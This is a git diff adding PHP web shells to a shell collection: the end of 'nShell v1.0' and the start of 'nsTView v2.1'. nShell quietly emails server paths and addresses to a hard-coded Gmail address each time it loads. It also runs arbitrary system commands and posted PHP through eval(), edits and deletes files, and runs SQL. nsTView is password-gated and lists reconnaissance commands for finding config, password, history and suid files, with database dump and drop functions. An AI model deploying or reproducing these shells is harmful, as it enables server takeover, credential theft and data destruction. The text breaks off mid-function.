+echo "<b><font color=\"#000000\" size=\"3\" face=\"Georgia\"> System information: :</font><br>";             $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+?>
+<table width="80%" border="0">
+<td colspan="3" align="center">
+<?php
+function ex($comd)
+{
+ $res = '';
+if(function_exists("system"))
+	{
+	ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+	}elseif(function_exists("passthru"))
+	{
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+	}elseif(function_exists("exec"))
+	{
+    exec($comd,$res);
+    $res=implode("\n",$res);
+	}elseif(function_exists("shell_exec"))
+	{
+	$res=shell_exec($comd);
+	}elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+ }
+ return $res;
+}
+
+// safe mod
+$safe_mode=@ini_get('safe_mode');
+echo (($safe_mode)?("<div>Safe_mode: <b><font color=green>ON</font></b>"):("Safe_mode: <b><font color=red>OFF</font></b>"));
+echo "    ";
+// phpversion
+echo "Php version<font color=\"green\"> : ".@phpversion()."</font>";
+echo "    ";
+// curl
+$curl_on = @function_exists('curl_version');
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo "    ";
+// mysql
+echo "MYSQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "    ";
+// msssql
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "    ";
+// PostgreSQL
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "    ";
+// Oracle
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "    ";
+// Disable function
+echo "Disable functions : <b>";
+$df=@ini_get('disable_functions');
+if(!$df){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+echo "    ";
+//==============xac dinh os==================
+$servsoft = $_SERVER['SERVER_SOFTWARE'];
+if (ereg("Win32", $servsoft)){
+$sertype = "win";
+}
+else
+{
+$sertype = "nix";
+}
+//=========================================
+
+$uname=ex('uname -a');
+ echo "<br>OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ $server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+echo "<font color=\"black\"><a href=".$_SERVER['PHP_SELF']."?act=info target=_blank>Php Info</a></font><br></div>";
+
+?>
+</td><tr>
+<td width="20%" align="center"><a href="<?=$myname?>?act=manager"> File Manager</a></td>
+<td width="20%" align="center"><a href="<?=$myname?>?act=sql">Sql Query</a></td>
+<td width="20%" align="center"><a href="<?=$myname?>?act=eval">Eval()</a></td><tr>
+<td colspan="3" >
+<?php
+$act=@$_GET['act'];
+if($act=="info"){
+echo "<center><font color=red size=10> Php Version :".phpversion()."</font>";
+phpinfo();
+echo "</center>";
+}
+?>
+<?php
+//=========================================================
+function perms($mode)
+{
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+//===================Delect File=============================
+$del=$_GET['del'];
+function  delfile($name)
+{
+    passthru("del ".$name);
+}
+function deldir($name)
+{
+	passthru("rmdir ".$name);
+}
+if($del)
+{
+  if(is_file($del)) delfile($del); else deldir($del);
+}
+//==================Quan li thu muc ==========================
+if($act=="manager"){
+$arr = array();
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table width=100%><tr><td align=center><b>Name</td><td align=center><b>Type</td><td align=center><b>Size</td><td align=center><b>Perms</td><td align=center>Delete</td></tr>";
+foreach ($arr as $filename) {
+if ($filename != "." and $filename != ".."){
+if (is_dir($filename) == true){
+$directory = "";
+$dc=str_replace("\\","",dirname($_SERVER['PHP_SELF']));
+$directory = $directory . "<tr><td align=center>$filename</td><td align=center>" .ucwords(filetype($filename)) . "</td><td></td><td align=center>" . perms(fileperms($filename))."<td align=center><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$dc.">Del</td>";
+$dires = $dires . $directory;
+}
+if (is_file($filename) == true){
+$file = "";
+$link=str_replace(basename($_SERVER['REDIRECT_URL']),$filename,$_SERVER['REDIRECT_URL']);
+$file = $file . "<tr><td><a href=".$link	." target=_blank>$filename</a></td><td>" .ucwords(filetype($filename)). "</td><td>" . filesize($filename) . "</td><td>" . perms(fileperms($filename))."<td><a href=".$_SERVER['PHP_SELF']."?act=manager&del=".$filename.">Del <a href=".$_SERVER['PHP_SELF']."?act=manager&file=".$filename.">Edit</a></td>";
+$files = $files . $file;
+}
+}
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+}
+// view file ex: /etc/passwd
+if(isset($_REQUEST['file']))
+	{
+$file=@$_REQUEST["file"];
+echo "<b>File :</b><font color=red>   ". $file."</font>";
+$fp=fopen($file,"r+") or die("Ban khong co quyen de ghi vao File nay , hoac do khong tim thay File");
+$src=@fread($fp,filesize($file));
+echo "<center><hr color=777777 width=100% height=115px><form action=".$_SERVER['REQUEST_URI']." method=post><TEXTAREA NAME=\"addtxt\" ROWS=\"5\" COLS=\"80\">".htmlspecialchars(stripslashes($src))."</TEXTAREA><br><input type=submit value=Save></form><hr color=777777 width=100% height=115px>";
+$addtxt=@$_POST["addtxt"];
+ rewind($fp);
+ if($addtxt=="") @fwrite($fp,stripslashes($src)); else $rs=@fwrite($fp,stripslashes($addtxt));
+ if($rs==true)
+ {
+ echo "Noi dung cua file nay da duoc sua doi !<a href=".$_SERVER['REQUEST_URI'].">Xem lai</a>";
+ }
+ ftruncate($fp,ftell($fp));
+echo "</center>";
+ }
+
+?>
+
+<?php
+// function
+function exe_u($query)
+{
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong update du lieu duoc !");
+if(mysql_affected_rows($result)>=0) echo "Affected rows : ".mysql_affected_rows($result)."This is Ok ! ^.^<br>";
+}
+function exe_c($query)
+{
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong Create duoc !");
+echo "This is Ok ! ^.^<br>" ;
+}
+function exe_d($query)
+{
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong Drop duoc  !");
+echo "This is Ok ! ^.^<br>" ;
+}
+function exe_w($query)
+{
+echo "<b><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong the show gi duoc het !");
+if(eregi("fields",$query)) {
+while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
+echo "<b><font color=red>".$row['Field']." :</font></	b> ".$row['Type'];
+echo "<br>";
+}
+} else {
+while($row=@mysql_fetch_array($result,MYSQL_ASSOC)){
+   while(list($key,$value)=each($row))
+{
+	echo "<font color=red><b>".$value."</b><font>";
+}
+echo "<br>";
+}
+}
+}
+function exe_s($query)
+{
+$arrstr=@array();$i=0;
+$arrstr=explode(" ",$query);
+$find_field=@mysql_query("show fiedls from ".$arrstr['4']);
+while($find_row=@mysql_fetch_array($find_field,MYSQL_ASSOC)){
+$i++;
+$arrstr[$i]=$find_row['Field'];
+}
+echo "<B><font color=green>Query # ".$query."</font></b><br>";
+$result=@mysql_query($query) or die("Khong the select gi duoc het !");
+$row=@mysql_num_rows($result);
+}
+function sql($string)
+{
+$arr=@array();
+$arr=explode(";",$string);
+for($i=0;$i<=count($arr);$i++)
+	{
+	$check_u=eregi("update",@$arr[$i]); if($check_u==true)  exe_u(@$arr[$i]);
+	$check_e=eregi("use",@$arr[$i]); if($check_u==true)  exe_u(@$arr[$i]);
+	$check_c=eregi("create",@$arr[$i]); if($check_c==true) exe_c(@$arr[$i]);
+	$check_d=eregi("drop",@$arr[$i]); if($check_d==true) exe_d(@$arr[$i]);
+	$check_w=eregi("show",@$arr[$i]); if($check_w==true) exe_w(@$arr[$i]);
+    $check_s=eregi("select",@$arr[$i]); if($check_s==true) exe_s(@$arr[$i]);
+	}
+}
+//=====xong phan function cho sql
+// Sql query
+if($act=="sql")
+{
+	 if(isset($_GET['srname'])&&isset($_GET['pass']))
+	{
+	 echo $_GET['srname'];
+if(!isset($_GET['srname'])) 	$servername=$_GET['srname'];
+   else $servername="localhost";
+$con=@mysql_connect($servername,$_GET['uname'],$_GET['pass']) or die("Khong the connect duoc !");
+$form2="<center><form method=post  action=".$_SERVER['PHP_SELF']."><TEXTAREA NAME=\"str\" ROWS=\"2\" COLS=\"60\"></TEXTAREA><br><input type=submit name=s2 value=query></form></center>";
+echo $form2;
+$str=@$_POST['str'];
+if(isset($str)) sql($str);
+	}
+	else {
+		echo "chao";
+		$form1="<center><form method=GET action='".$_SERVER['PHP_SELF']."'><table width=100% boder=0><td width=100%> User Name : <input type=text name=uname size=20> Server Name :<input name=srname type=text  size=22></td><tr><td width=100%> Password :<input type=text name=pass size=20> Port : <input type=text name=port size=20><input type=submit value=login></form></td></form></table><hr color=777777 width=100% height=115px>";
+        echo $form1;
+             }
+}
+?>
+
+<?php
+if($act=="eval"){
+$script=$_POST['script'];
+if(!$script){
+echo "<hr color=777777 width=100% height=115px><form action=".$_SERVER['']." method=post><TEXTAREA NAME=\"\" ROWS=\"5\" COLS=\"60\"></TEXTAREA><input type=submit value=Enter></form><hr color=777777 width=100% height=115px>";
+}else{
+eval($script);
+}
+}
+?>
+</td>
+</table>
+
+<font face=Webdings size=6><b>!</b></font><b><font color=\"#000000\" size=\"3\" face=\"Georgia\">nShell v1.0. Code by Navaro.</font><br><b><font color="#000000" face="Georgia">Have Fun ! {^.^} { ~.~} </font></b>
+</center>
+</body>
+
+
+ 
diff --git a/138shell/N/nstview.php.txt b/138shell/N/nstview.php.txt
new file mode 100644
index 0000000..4ecf4bb
--- /dev/null
+++ b/138shell/N/nstview.php.txt
@@ -0,0 +1,2136 @@
+<?
+@session_start();
+@set_time_limit(0);
+@set_magic_quotes_runtime(0);
+error_reporting(E_ALL & ~E_NOTICE);
+#####cfg#####
+# use password  true / false #
+$create_password = true;
+$password = "nst";    // default password for nstview, you can change it.
+
+# UNIX COMMANDS
+# description (nst) command
+# example: Shutdown (nst) shutdown -h now
+$fast_commands = "
+Show open ports (nst) netstat -an | grep LISTEN | grep tcp
+last root (nst) last root
+last (all users) (nst) last all
+Find all config.php in / (nst) find / -type f -name config.php
+Find all config.php in . (nst) find . -type f -name config.php
+Find all admin.php in / (nst) find / -type f -name admin.php
+Find all admin.php in . (nst) find . -type f -name admin.php
+Find all config.inc.php in / (nst) find / -type f -name config.inc.php
+Find all config.inc.php in . (nst) find . -type f -name config.inc.php
+Find all config.inc in / (nst) find / -type f -name config.inc
+Find all config.inc in . (nst) find . -type f -name config.inc
+Find all config.dat in / (nst) find / -type f -name config.dat
+Find all config.dat in . (nst) find . -type f -name config.dat
+Find all config* in / (nst) find / -type f -name config*
+Find all config* in . (nst) find . -type f -name config*
+Find all pass* in / (nst) find / -type f -name pass*
+Find all pass* in . (nst) find . -type f -name pass*
+Find all .bash_history in / (nst) find / -type f -name .bash_history
+Find all .bash_history in . (nst) find . -type f -name .bash_history
+Find all .htpasswd  in / (nst) find / -type f -name .htpasswd
+Find all .htpasswd  in . (nst) find . -type f -name .htpasswd
+Find all writable dirs/files in / (nst) find / -perm -2 -ls
+Find all writable dirs/files in . (nst) find . -perm -2 -ls
+Find all suid files in / (nst) find / -type f -perm -04000 -ls
+Find all suid files in . (nst) find . -type f -perm -04000 -ls
+Find all sgid files in / (nst) find / -type f -perm -02000 -ls
+Find all sgid files in . (nst) find . -type f -perm -02000 -ls
+Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
+Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
+OS Version? (nst) sysctl -a | grep version
+Kernel version? (nst) cat /proc/version
+cat syslog.conf (nst) cat /etc/syslog.conf
+Cat - Message of the day (nst) cat /etc/motd
+Cat hosts (nst) cat /etc/hosts
+Distrib name (nst) cat /etc/issue.net
+Distrib name (2) (nst) cat /etc/*-realise
+Display all process - wide output (nst) ps auxw
+Display all your process (nst) ps ux
+Interfaces (nst) ifconfig
+CPU? (nst) cat /proc/cpuinfo
+RAM (nst) free -m
+HDD space (nst) df -h
+List of Attributes (nst) lsattr -a
+Mount options (nst) cat /etc/fstab
+Is cURL installed? (nst) which curl
+Is wGET installed? (nst) which wget
+Is lynx installed? (nst) which lynx
+Is links installed? (nst) which links
+Is fetch installed? (nst) which fetch
+Is GET installed? (nst) which GET
+Is perl installed? (nst) which perl
+Where is apache (nst) whereis apache
+Where is perl (nst) whereis perl
+locate proftpd.conf (nst) locate proftpd.conf
+locate httpd.conf (nst) locate httpd.conf
+locate my.conf (nst) locate my.conf
+locate psybnc.conf (nst) locate psybnc.conf
+";
+
+
+
+# WINDOWS COMMANDS
+# description (nst) command
+# example: Delete autoexec.bat (nst) del c:\autoexec.bat
+$fast_commands_win = "
+OS Version (nst) ver
+Tasklist  (nst) tasklist
+Attributes in . (nst) attrib
+Show open ports (nst) netstat -an
+";
+
+
+
+
+
+######ver####
+$ver= "v2.1";
+#############
+$pass=$_POST['pass'];
+if($pass==$password){
+$_SESSION['nst']="$pass";
+}
+if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
+else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
+else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
+else $ip = $_SERVER['REMOTE_ADDR'];
+$ip=htmlspecialchars($ip);
+
+if($create_password==true){
+
+if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
+die("
+<title>nsTView $ver:: nst.void.ru</title>
+<center>
+<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
+<font size=1 face=verdana><center>
+<b>nsTView $ver :: <a href=http://nst.void.ru style='text-decoration:none;'><font color=black>nst.void.ru</font></a><br></b>
+</center>
+<form method=post>
+Password:<br>
+<input type=password name=pass size=30 tabindex=1>
+</form>
+<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
+<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
+<b>Your ip:</b> ".$ip."
+</td></tr></table>
+");}
+
+}
+$d=$_GET['d'];
+
+function adds($editf){
+#if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+#}
+return $editf;
+}
+function adds2($editf){
+if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+}
+return $editf;
+}
+
+$f   = "nst_sql.txt";
+$f_d = $_GET['f_d'];
+
+if($_GET['download']){
+$download=$_GET['download'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+
+if($_GET['dump_download']){
+header("Content-disposition: attachment; filename=\"$f\";");
+header("Content-length: ".filesize($f_d."/".$f));
+header("Expires: 0");
+readfile($f_d."/".$f);
+if(is_writable($f_d."/".$f)){
+unlink($f_d."/".$f);
+}
+die;
+}
+
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center><a href=http://nst.void.ru target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+if(@$_GET['img']=="1"){
+@$e=$_GET['e'];
+header("Content-type: image/gif");
+readfile("$d/$e");
+}
+if(@$_GET['getdb']=="1"){
+header('Content-type: application/plain-text');
+header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
+}
+print "<title>nsT View $ver</title>
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>
+<script>
+function ShowOrHide(d1, d2) {
+if (d1 != '') DoDiv(d1);
+if (d2 != '') DoDiv(d2);}
+
+function DoDiv(id) {
+var item = null;
+if (document.getElementById) {
+item = document.getElementById(id);
+} else if (document.all){
+item = document.all[id];
+} else if (document.layers){
+item = document.layers[id];}
+if (!item) {}
+else if (item.style) {
+if (item.style.display == \"none\"){ item.style.display = \"\"; }
+else {item.style.display = \"none\"; }
+}else{ item.visibility = \"show\"; }}
+
+function cwd(text){
+document.sh311Form.sh3.value+=\" \"+ text;
+document.sh311Form.sh3.focus();
+}
+
+
+</script>
+";
+print "<body vlink=#0006DE>
+<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
+<tr><td><font face=wingdings size=2>0</font>";
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
+if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
+echo "</td></tr>";
+if($os=="unix"){ echo "
+<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
+<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
+[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
+[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
+[<a href='$php_self'>Home</a>]
+[<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
+[<a href='$php_self?d=$d&t=upload'>Upload</a>]
+[<a href='$php_self?t=tools'>Tools</a>]
+[<a href='$php_self?p=info'>PHPinfo</a>]
+[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
+[<a href='$php_self?p=sql'>SQL</a>]
+[<a href='$php_self?p=selfremover'>Self Remover</a>]
+</td></tr>
+";
+if($os=="win"){ echo "
+<tr><td bgcolor=white>
+<center><font face=wingdings size=2><</font>
+<a href='$php_self?d=a:/'>A</a>
+<a href='$php_self?d=b:/'>B</a>
+<a href='$php_self?d=c:/'>C</a>
+<a href='$php_self?d=d:/'>D</a>
+<a href='$php_self?d=e:/'>E</a>
+<a href='$php_self?d=f:/'>F</a>
+<a href='$php_self?d=g:/'>G</a>
+<a href='$php_self?d=h:/'>H</a>
+<a href='$php_self?d=i:/'>I</a>
+<a href='$php_self?d=j:/'>J</a>
+<a href='$php_self?d=k:/'>K</a>
+<a href='$php_self?d=l:/'>L</a>
+<a href='$php_self?d=m:/'>M</a>
+<a href='$php_self?d=n:/'>N</a>
+<a href='$php_self?d=o:/'>O</a>
+<a href='$php_self?d=p:/'>P</a>
+<a href='$php_self?d=q:/'>Q</a>
+<a href='$php_self?d=r:/'>R</a>
+<a href='$php_self?d=s:/'>S</a>
+<a href='$php_self?d=t:/'>T</a>
+<a href='$php_self?d=u:/'>U</a>
+<a href='$php_self?d=v:/'>V</a>
+<a href='$php_self?d=w:/'>W</a>
+<a href='$php_self?d=x:/'>X</a>
+<a href='$php_self?d=y:/'>Y</a>
+<a href='$php_self?d=z:/'>Z</a>
+</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
+print "<tr><td>
+:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
+<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
+<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::";
+if($os=="unix"){
+print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
+}
+print "</td></tr>";
+
+
+
+
+
+if($_GET['p']=="ftp"){
+print "<tr><td>";
+
+
+
+print "</td></tr></table>";
+print $copyr;
+exit;
+}
+
+
+
+
+
+
+
+
+
+
+if(@$_GET['p']=="sql"){
+print "<tr><td>";
+###
+
+$f_d = $_GET['f_d'];
+if(!isset($f_d)){$f_d=".";}
+if($f_d==""){$f_d=".";}
+
+$php_self=$_SERVER['PHP_SELF'];
+$delete_table=$_GET['delete_table'];
+$tbl=$_GET['tbl'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$adress=$_POST['adress'];
+$port=$_POST['port'];
+$login=$_POST['login'];
+$pass=$_POST['pass'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+$conn=$_GET['conn'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+
+?>
+<style>
+table,td{
+color: black;
+font-face: verdana;
+font-size: 11px;
+
+}
+</style>
+<font color=black face=verdana size=1>
+<? if(!$conn){ ?>
+
+<!-- table 1 -->
+<table bgcolor=#D7FFA8>
+<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
+<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
+</table>
+<!-- end of table 1 -->
+
+
+<?
+$conn=$_GET['conn'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
+if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
+print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
+print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
+print "<br><font color=red>[db]</font><Br>";
+print "<font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+$tc++;
+}
+$baza=$_GET['baza'];
+$db=$_GET['db'];
+print "<font color=red>[Total db: $tc]</font><br>";
+if($baza){
+print "<div align=left><font color=green>db: [$db]</div></font><br>";
+$result=@mysql_list_tables($db);
+while($str=@mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+
+if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
+if($records[0]=="0"){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
+}else{
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+}
+mysql_free_result($c);
+$total_t++;
+}
+print "<br><B><font color=red>Total tables: $total_t</font></b>";
+                                print "<pre>";
+for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
+                                print "</pre>";
+} #end baza
+
+
+
+
+# delete table
+if(isset($delete_table)){
+mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
+}
+# end of delete table
+
+# delete database
+if(isset($_GET['delete_db'])){
+mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
+}
+# end of delete database
+
+# delete row
+if(isset($_POST['delete_row'])){
+$_POST['delete_row'] = base64_decode($_POST['delete_row']);
+mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
+$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
